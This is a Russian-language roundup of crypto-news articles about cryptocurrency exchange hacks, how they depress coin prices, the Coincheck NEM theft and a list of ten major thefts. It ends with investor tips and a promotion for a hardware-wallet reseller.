Согласна с мнением о риске и Мария Сальникова, ведущий аналитик ООО «Эксперт плюс»: «Сейчас на рынок выходят только те инвесторы, которые готовы рисковать. Всем известно, что активы ничем не подкреплены, жаловаться на форс-мажоры совершенно некому, а хакеры час от часу становятся сильнее и мощнее, позволяя себе взломы авторитетных площадок. Безусловно, позитивный эффект оказывает информация о том, что руководство Buthumb пообещало возместить все потери пользователей».
Но и постоянное возмещение средств — далеко не выход, ведь никогда не знаешь, на каком именно этапе этих средств не хватит для компенсации. Помимо этого, по мнению исполнительного директора ICBF Максима Ефремова, биржи в нынешнем виде могут просто перестать работать без какого-либо предупреждения, они уже испытывают сложности с масштабированием, они обязаны передавать информацию о клиентах регулирующим органам, которые, кстати говоря, могут просто их прикрыть, как это уже было, например, в Китае. Очевидным решением проблемы, на его взгляд, является запуск децентрализованных бирж, что уже происходит в случае со Stellar и CryptoBridge. Наилучшим же вариантом, по мнению эксперта, будет вовсе поиск некоего гибридного варианта, который бы пришелся по нраву институциональным инвесторам, в том числе, тем, которые стремятся к торгам без опаски, так как им есть, что терять.
smart-lab.ru
как влияют на курс криптовалют и что делать инвестору ᐈ Сообщество Сryptonet
На фоне известий об очередном взломе криптобиржи курс криптовалют снова упал и среди инвесторов поднялась паника. Аналогичные настроения наблюдаются при взломах регулярно, хотя, казалось бы, объективных причин тому нет: взломан сайт, а не криптовалюта. Но взломы бирж и кошельков и падение курса криптовалют взаимосвязаны, и для выбора наилучшей стратегии поведения в таких обстоятельствах имеет смысл ее разобрать!
Почему взломы бирж и кошельков обеспечивают падение курса криптовалют?
Падение курса криптовалют всегда в той или иной степени — следствие их обесценивания в глазах криптопользователя, и взломы — не исключение.
Среди причин падения курса криптовалют после взломов бирж можно выделить следующие:
- Потеря вложений. Ставшие жертвами взлома инвесторы часто уходят с рынка — либо не имеют свободных средств для формирования нового криптовалютного портфеля, либо собираются подождать появления более надежных ресурсов, либо разочаровываются и решают не иметь больше дела с активом, который принес потери. Какой бы ни была мотивация, количество заинтересованных в криптовалюте людей уменьшается, и ее курс падает. Особенно страдают малопопулярные валюты.
- Осторожность. Многие инвесторы уходят с рынка после взломов, не будучи жертвами. Человек полагает, что раз взломана одна биржа или кошелек, то может быть взломан и его счет, поэтому лучше повременить и отдать пока деньги в обычный банк. Занятно, что «осторожные» инвесторы часто, когда паника сходит на нет, снова закупают актив — нередко с реальным убытком для себя.
- «Все уходят, уйду и я». Часть криптопользователей не только разочаровывается, а и транслирует свое разочарование вовне — так убедительно, что ажиотаж вокруг события во много раз превышает его значимость. В инфополе, подогреваемом регулярными сообщениями скептиков, криптовалюты начинают казаться более ненадежным активом, чем на самом деле, и обесцениваются — в глазах людей и на рынке.
- Снижение уровня доверия. Криптовалюты — новый актив, который вызывает у людей сомнения в силу свойственной человеку консервативности. Чем больше они завоевывают рынок, чем больше положительных новостей, тем больше люди им доверяют. Чем больше новостей отрицательных — тем сильнее доверие падает. Поскольку именно доверие на нынешнем этапе во многом определяет рыночную ценность криптовалют, то падает и рыночная ценность.
- Трейдеры. Криптотрейдеры после появления сообщений о взломах начинают играть на понижение: продают криптовалюты, когда курс начинает падать, дожидаются момента, когда он на фоне всеобщей паники упадет еще больше, и на минимуме цены закупают валюты вновь. Максимально возможный обвал курса — в их интересах, и многие стараются падение усилить. Одни продают большие объемы активов, другие намеренно сеют панику, предлагают людям срочно продавать активы и так далее.
>>> Читайте также: Криптовалюта беззащитна перед хакерами: правда или миф?
Как взломы бирж и кошельков приводят к падению курса криптовалют?
Таким образом, связь между взломами и падением курса очевидна:
- Едва появляется известие о взломе, игроки начинают продавать валюту и курс немного падает.
- Инвесторы видят, что курс падает, связывают это со взломом, разочаровываются и продают активы, усиливая падение курса.
- Криптопользователи, которые не слышали о взломе, видят сильное падение курса и тоже начинают избавляться от активов.
- Паника нарастает, количество продающих растет как снежный ком.
- Крупные игроки подливают масла в огонь, поскольку паника — наилучшие обстоятельства, в которых при минимуме усилий можно достичь максимального падения курса.
Катализатором этой цепочки могут стать не трейдеры, а, скажем, крупный инвестор, сделавший заявление в СМИ, или обычные криптопользователи, которые сталкивались раньше со взломами и знают, что за ними последует.
Может им стать и «разоблачающая» биржу или ее создателей статья, негативное внимание политиков к произошедшему и многое другое.
Насколько сильно взломы бирж и кошельков влияют на курс криптовалют?
То, как сильно упадет курс, зависит от ряда факторов:
- От реальности убытков. Если биржа или кошелек взломаны, но деньги не украдены, пострадает только репутация ресурса и отчасти — репутация криптовалют. Ринутся продавать их только самые осторожные, эмоциональные или не разобравшиеся в ситуации инвесторы, которых немного, поэтому курс снизится незначительно. Если мошенникам удалось украсть миллионы, то ажиотаж поднимется огромный и людей, продающих активы на волне ажиотажа или вследствие разочарования, будет больше.
- От размера убытков. Если украден десяток биткоинов, которые крупная биржа сумеет возместить, разочаровавшихся будет меньше и ажиотаж вскоре утихнет. Если украдены миллионы, возместить которые ресурс не сможет, если начнутся аресты имущества и история затянется, то уйдет в сотни раз больше инвесторов.
- От репутации ресурса. Если взломана давно существующая, надежная биржа, то курс упадет существенно. «Если уж этой бирже нельзя доверять, то кому вообще тут доверять можно?» — начнут спрашивать пользователи и продадут активы, решив подождать, пока криптосфера отрегулируют государства и от таких происшествий клиенты бирж будут застрахованы. Если была взломана малоизвестная, недавно появившаяся биржа, то заметного падения курса ждать не стоит: пользователи крупных ресурсов решат, что она была недостаточно защищена, и продолжат торговать там, где защита, по их мнению, удовлетворительна.
- От сопутствующих новостей. Негативное известие нельзя рассматривать отдельно от остальных. Оно может иметь больший или меньший вес, но в конечном итоге его влияние на курс зависит от всего информационного поля. Если негативную новость уравновешивает позитивная, то курс, конечно, поколеблется, но умеренно. И наоборот: если новость ничем не уравновешена или, того хуже, есть другие негативные новости, то курс может обвалиться сильно и надолго. Последнее часто используют спекулянты, находя и распространяя максимум негативных новостей тогда, когда появилось известие о взломе: так курс падает намного больше, чем упал бы при появлении каждой новости в лучшие для криптосферы времена.
Снизят ли взломы бирж и кошельков свое влияние на курс?
Исключить зависимость крипторынка от взломов полностью в силу вышеназванных причин невозможно.
Всегда будут находиться чрезмерно осторожные люди, не разобравшиеся в ситуации пользователи и спекулянты. Но не исключено, что со временем удастся эту зависимость снизить.
Стратегий здесь существует несколько:
- Это может произойти, когда пользователи криптобирж будут уверены в безопасности своих средств больше, чем сейчас. При очередном известии о взломе инвестор сегодня думает о том, что то же самое может произойти и с ним, и противостоит этому как может — продает активы и уходит. Гарантии со стороны законодательства, страхование рисков, наличие и подтверждение материального обеспечения со стороны полностью децентрализованной криптобиржи и другие обязательства со стороны владельцев бирж и кошельков снизят количество опасений у инвесторов, и, таким образом, они будут спокойнее реагировать на новости о взломе других ресурсов.
- Может помочь ограничение трейдеров. На традиционных биржах существует такая практика, как ограничение количества сделок после выхода наиболее резонансных новостей, вплоть до полного запрета в течение определенного времени, пока ажиотаж не спадет. Возможно, введение подобных ограничений на криптобиржах также помогло бы сдержать падение курса.
- Может помочь создание СМИ, которые публиковали бы только проверенную информацию и были бы известны каждому инвестору. СМИ, к которым инвестор мог бы обратиться в случае появления неясных слухов и получить максимально достоверные сведения. В отсутствие таких ресурсов инвестор пребывает в неизвестности и при малейших негативных слухах о взломе, часто преувеличенных или неправдивых, избавляется от перспективных активов.
- Повышение грамотности инвесторов может удержать их от эмоциональных действий и сдержать курс, падающий в том числе из-за таких действий. Например, есть люди, которые под взломом кошелька с Биткоинами понимают взлом самого Биткоина, что заставляет их как можно скорее избавляться от «взломанного» актива. Более осведомленные инвесторы хоть и понимают, что взлом кошелька и взлом Биткоина ничего общего между собой не имеют, опасаются, что Биткоин из-за взлома кошелька обвалится или что падение курса — это «начало конца», о котором часто говорят скептики. Литературы и другой информации о функционировании криптоэкономики мало, а людей, не знакомых даже с элементарными особенностями рынка, много, поэтому даже небольшой ликбез способен улучшить ситуацию.
С другой стороны, криптосообществу, видимо, придется подождать, пока хотя бы один из этих сценариев воплотится в жизнь. Рассчитывать на помощь со стороны законодательных органов рано, поскольку многие страны только определились со статусом криптовалют и явно не готовы к серьезному вмешательству в криптосферу.
>>> Читайте также: Регулирование рынка криптовалют: недостатки и преимущества
Владельцы бирж и кошельков могут предпринять те или иные шаги, но введение, например, ограничений на торговлю на одной бирже не поспособствует ее популярности: трейдеры просто уйдут на другой ресурс.
Ограничения подействуют, если к общему решению придут несколько ведущих криптобирж, а в обозримом будущем это вряд ли возможно, так как биржи сейчас борются за клиента, и не в их интересах ограничивать его, поскольку тут же появятся конкуренты без ограничений.
Остается рассчитывать разве что на появление качественных СМИ, общедоступных видеолекций или книг, которые разъясняли бы начинающим инвесторам особенности криптоэкономики и обучали самостоятельно принимать решения в нетривиальных ситуациях. Но и на это требуется время.
Что делать инвестору, который слышит новости о взломах бирж и кошельков?
Пока ничего из перечисленного нет, инвестору при очередном взломе биржи или криптокошелька приходится действовать самостоятельно.
- Следует выяснить, был ли взлом на самом деле. Возможно, это попытка взлома или обнаружение уязвимости. Стоит зайти на официальный канал (в Твиттере, Телеграме, на любом другом ресурсе) биржи или кошелька и выяснить правду. Если канала нет — спросить у разработчиков.
- Полезно выяснить, насколько велики потери. Источники информации — тоже как можно более официальные. Разумеется, если взлом был или уязвимость не устранена немедленно, а у инвестора на этом ресурсе есть средства, нужно как можно скорее попытаться их перевести на другой кошелек (не факт, что получится, но попытаться стоит). Бывает так, что владельцы ресурса не сообщают ничего конкретного или сообщают, что все в полном порядке. Здесь тоже лучше быть настороже и перевести средства на другой адрес, потому что чаще такие заявления значат либо то, что владельцы ресурса не знают, как справиться с последствиями взлома, потому что последствия серьезны и угрожают закрытием ресурса, либо то, что владельцы сами имеют отношение к мошенникам. Конечно, может быть действительно все в порядке, но, во-первых, в таких случаях заявления владельцев обычно вполне прозрачны, во-вторых, дыма без огня не бывает.
- Если инвестор не имеет отношения к взломанному ресурсу, то единственное, что ему стоит предпринять, — это проверить, нет ли среди его активов валют, которые от сильной встряски курса могут обвалиться без возможности восстановления. Если есть — их стоит продать, и это единственная ситуация, когда из-за новостей о взломе целесообразно продавать активы. Не считая, конечно, тех случаев, когда инвестор хочет сыграть на понижение.
В целом же ведущие и востребованные валюты после взломов восстанавливаются по той простой причине, что не теряют свою фактическую ценность из-за ситуаций на сторонних ресурсах.
Поэтому самое разумное — дождаться, когда ажиотаж утихнет, независимо от того, восстановится ли биржа или кошелек после удара или нет, выбрать другой надежный ресурс и продолжать работать с криптовалютами, как и прежде.
>>> Читайте также: Падение криптовалют: причины обвалов курса и как заработать на них
Хотите инвестировать в малоизвестные криптовалюты, которые сейчас стоят дешево, но способны выстрелить и дать многократную прибыль, как EOS или TRON?
cryptonet.biz
В результате взлома биржи Coincheck украдены NEM на $530 миллионов
Как передаёт японский источник MineCC, руководство криптовалютной биржи Coincheck официально объявило о взломе и краже токенов NEM на 532 млн долларов. Пока остается неясным, были ли украдены другие криптовалюты.
Разработчики NEM и сообщество разработчиков с открытым исходным кодом подтвердили, что хардфорка для восстановления потерянных средств не будет. Президент NEM Foundation Лон Вонг заявил, что претензий к NEM быть не должно, и возложил полную ответственность за происшествие на Coincheck.
После взлома крупнейшая японская биржа Coincheck объявила о приостановке ряда услуг, включая вывод средств во всех крипто и фиатных валютах, в том числе японской йене. Приостановка началась, когда биржа отключила возможность пополнения кошельков криптовалюты NEM, о чем она объявила в 04:00 UTC. Через 30 минут было объявлено о запрете на торги NEM, вывод этой криптовалюты, а затем на вывод всех криптовалют и даже фиатных денег.
Тем не менее, на проведенной днем пресс-конференции CEO Coincheck заявил, что биржа не закроется и скоро вотсстановит все операции. Планов по компенсации потерь пользователей он не озвучил.
Кроме того, через некоторое время появилась информация о краже 101 265 057 XRP на сумму $123.5 миллиона, но CEO биржи на пресс-конференции ее не подтвердил. Таким образом, суммарные потери биржи составили около 532 миллионов долларов по курсу на момент ограбления, и 400 миллионов на момент публикации.
Взлом Coincheck на сегодняшний день можно считать самым крупным ограблением в истории криптовалют при пересчете на курс доллара. Так, крах биржи MtGox в 2014 году принес убытки около 480 миллионов долларов (850 000 BTC), а взлом Bitfinex в августе 2016 года - около 72 миллионов долларов (120 000 BTC). С другой стороны, можно взять иную точку отсчета. При пересчете на курс биткоина, убытки Coincheck составили менее 50 000 BTC, то есть значительно меньше потерь на Bitfinex, не говоря уже о MtGox.
bits.media
Десять самых крупных взломов бирж в истории
Содержание
В этом году в списках Forbes впервые появились миллиардеры, сделавшие состоянии на криптовалютах. Издание даже сделало отдельный рейтинг королей блокчейн монет. В интернете можно найти множество историй или даже городских легенд о быстром обогащении тех, кто сделал ставку на новую технологию или просто оказался в нужное время в нужном месте.
Однако, существует не меньше историй о том, как люди потеряли свои деньги из-за взломов и краж. В такой рискованной отрасли, как криптовалюты, оценка рисков должна быть основным фокусом.
Начинающие инвесторы, стремящиеся получить быструю прибыль, напротив, нарушают все возможные правила безопасности и теряют свои депозиты даже на растущем рынке. Не удивительно, что на фоне высокого интереса к криптовалютам и сохраняющейся опасности взломов, производители аппаратных кошельков для оффлайн хранения криптовалют столкнулись с таким огромным спросом, что приостанавливали продажу, а компания Ledger привлекла в начале 2018 года 75 миллионов долларов дополнительных инвестиций.
Мы решили вспомнить, какие события этому предшествовали и составили рейтинг из 10 самых крупных краж криптовалют за ее историю, чтобы вы могли поучиться на чужих ошибках.
Март 2014: взлом биржи Mt. Gox
Это был один из первых крупных скандалов, связанных с кражей крипты. Хакеры взломали биржу Mt. Gox и похитили со счетов пользователей 473 миллиона долларов в биткоинах. Позднее, эти события привели к многочисленным судебным искам и банкротству биржи уже в конце 2014 года.
Июнь 2016: Взлом анонимной децентрализованной организации
Из-за уязвимости в коде организации, хакеры похитили 50 миллионов долларов в эфирах с онлайн кошельков. В последствии, это привело к расколу блокчейна Эфириум на Ethereum и Ethereum Classic.
Июль 2016: взлом сайта Steemit.com
Уже через месяц после после кражи, описанной выше, социальная блокчейн сеть Steem была взломана, и с 260 аккаунтов были похищены все средства. Итоговая сумма кражи составила окола миллиона долларов.
Август 2016: взлом биржи Bitfinex
Скандалы лета 2016 завершились еще одной крупной кражей, которая стала одной из самых известных в мире криптовалют. Хакеры взломали биржу Bitfinex и похитили со счетов пользователей по разным оценкам от 65 до 72 миллиона долларов в биткоинах. Все средства были похищены с онлайн кошельков биржи с многоуровневой защитой.
Июль 2017: взлом Coin Dash
Взлом Coin Dash отличается от остальных случаев, так как в этой истории никакие аккаунты не были взломаны. Хакеры отсылали письма от лица компании, якобы привлекая средства в рамках ICO. В итоге хакеры скрылись с сумой в 7 миллионов долларов в эфирах.
Июль 2017: взлом Parity
Хакеры, которые нашли уязвимость в онлайн-кошельке Parity и получили доступ к средствам, которые привлекались на ICO нескольких блокчейн проектов (Edgeless, Casino, Swarm City and Aeternity blockchain). В конечном итоге злоумышленники похитили 32 миллиона долларов в эфирах.
Июль 2017: взлом Veritaseum
По уже знакомой схеме, хакеры получили доступ к онлайн кошелькам, которые хранили деньги, собранные на ICO. Кража обошлась инвесторам в 8 миллионов долларов
Август 2017: взлом Enigma
Прежде чем украсть средства, хакеры создали фиктивную страницу гендиректора проекта и в последствии сделали рассылку от его имени для привлечения средств. Им удалось собрать относительно небольшие полмиллиона долларов в эфирах.
Ноябрь 2017: взлом Tether
Все детали этого случая до сих пор не известны. Но сама компания отчиталась о пропаже 31 миллиона долларов из-за уязвимости системы, которую использовали хакеры для кражи криптовалюты с онлайн кошельки с валютой Tether (аналог доллара в криптомире).
Январь 2018: взлом биржи Coincheck
Последний крупный скандал со взломом криптобиржи и кражи средств пользователей, которые хранили счета на онлайн аккаунтах биржи. Украденные рекордные 530 миллионов долларов привлекли внимание Японского правительства, которое ужесточило контроль над криптобиржами. До сих пор этот взлом является крупнейшим в истории.
Все описанные истории доказывают, что средства, хранящиеся на счетах криптобирж или в онлайн кошельках всегда находятся в зоне повышенного риска, а самым безопасным способом хранения криптовалют, по-прежнему, являются аппаратные кошельки.
К сожалению, некоторые производители перестали доставлять кошельки в Россию из-за сложности оформления на таможне. Поэтому, если нет возможности посетить Францию или Чехию, где расположены производители, покупать кошельки в России и странах СНГ стоит только у официальных реселлеров, одобренных и указанных на официальных сайтах производителей (раздел «Resellers»).
Основной партнер аппаратных криптокошельков на территории РФ, отмеченный производителями – магазин Walletz.ru, имеющий в наличии самые популярные и надежные бренды.
Учитесь на чужих ошибках, оценивайте риски и храните в безопасности свои криптовложения!
Источник: mining-cryptocurrency.ru
ecrypto.ru